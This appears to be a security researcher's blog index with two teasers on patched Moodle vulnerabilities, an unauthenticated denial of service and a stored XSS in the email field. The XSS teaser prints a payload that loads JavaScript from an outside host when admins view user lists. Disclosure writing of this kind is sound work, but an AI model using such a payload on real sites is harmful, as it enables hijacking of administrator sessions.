CVE-2020-14322 @ Moodle – Unauthenticated Denial of Service [ BREAKTIME ]

This blogpost is about a Unauthenticated DoS vulnerability which I found in Moodle in April, 2020. It was fixed in 13 July 2020 and was assigned CVE-2020-14322. Legal disclaimer: Usage of this vulnerability for attacking targets without prior mutual consent is illegal. It is the end user’s responsibility to obey all applicable local, state and… Continue reading CVE-2020-14322 @ Moodle – Unauthenticated Denial of Service [ BREAKTIME ]

CVE-2019-14881 @ Moodle – Stored-Xss on email reflected on various pages

This blogpost is about a Stored Xss vulnerability which I found in Moodle in September, 2019. It was fixed in November 2019 and was assigned CVE-2019-14881. TLDR: If You especially craft a payload ( like “><svg/onload=import(‘https://c2.tadeu.work/a.js’)>”@tadeu.work ) and update your email you can execute javascript in certain pages like “browse users” in the admin area… Continue reading CVE-2019-14881 @ Moodle – Stored-Xss on email reflected on various pages